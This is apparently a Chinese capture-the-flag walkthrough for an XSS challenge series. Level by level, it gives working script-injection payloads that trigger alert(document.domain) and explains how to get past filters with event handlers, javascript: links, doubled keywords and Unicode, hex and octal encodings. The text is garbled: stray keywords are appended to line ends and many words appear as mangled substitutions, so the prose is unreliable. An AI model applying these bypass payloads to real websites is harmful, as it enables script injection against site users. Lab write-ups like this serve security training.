无过滤,</b><script>alert(document.domain)</script><b>javascript
注入点在input标签内,先后闭合标签中间加script语句java
"><script>alert(document.domain)</script><
浏览器
传递了两个参数,第一个参数过滤了<>dom
抓包,在第二个参数处闭合标签插入script语句xss
跟第三关差很少,抓包发现有第三个参数编码
在源代码中找到hackme的位置url
在第三个参数处构造xsscode
与第二关同样,可是在前段限制了语句长度,抓包构造xss提交便可blog
与第二关同样,注入点在value标签中,可是过滤了<>,没有过滤",能够用"闭合,构造事件进行xssseo
" onmouseover=alert(document.domain) name="1
onmouseover是鼠标移到上面就会触发的事件
" onclick=alert(document.domain) name="1
onclick是鼠标点击会触发事件
和第六关差很少,不一样的是这关不仅把<>过滤了,还把"也过滤了,没法用"分隔属性,可是能够用 (空格)分隔
" onclick=alert(document.domain) 要在空格前面加点东西,不然没法成功
题目要咱们输入一条url,而后会把url包含在<a>标签中,点击触发弹窗
在url中运行javascript的方法是以javascript:开头后跟要执行的语句,所以构造一下语句便可弹窗
javascript:alert(document.domain)
utf-7编码,用F12修改元素 onclick=alert(document.domain)直接过(每关均可以这样)
注入点在value里,可是过滤了domain,可双写绕过
"><script>alert(document.dodomainmain)</script><
value注入点,会在咱们构造的语句中的script前面加个x,且on事件所有不能用
构造<a>标签在超连接中执行js,构造时将script中任意一个字母用Unicode编码
"><a href="javascript:alert(document.domain)">1</a>
vlaue注入点,过滤了<、>、"和',将空格与"Unicode编码没法成功,由于没法用Unicode编码"、'、<、>来闭合标签或属性
" onmouseover=alert(document.domain) name="1
利用IE浏览器(不是Microsoft Edge)识别特性,IE浏览器会把``(键盘上方数字键1左边的那个键)识别成双引号
构造``onmouseover=alert(document.domain)成功弹窗
style注入点,转义了<>和"
查资料获得要利用IE浏览器支持的动态特性,可是IE版本过高,没法复现
同13关
DOM型XSS,转义了<>"&\,可是\能够双写绕过,能够用\\003c和\\003e代替<>
\\u003e\\u003cscript\\u003ealert(document.domain)\\u003c/script\\u003e
跟上题同样,只是替换了\x,即没法用十六进制绕过,用上题的代码直接过
\\u003e\\u003cscript\\u003ealert(document.domain)\\u003c/script\\u003e
用八进制编码也能够绕过,即将<>用十六进制编码后再转为八进制,格式是\\7四、\\76
\\74script\\76alert(document.domain)\\74/script\\76
题目说只能在老版本IE上复现,可跳过
不会,也没找到别的大佬的WP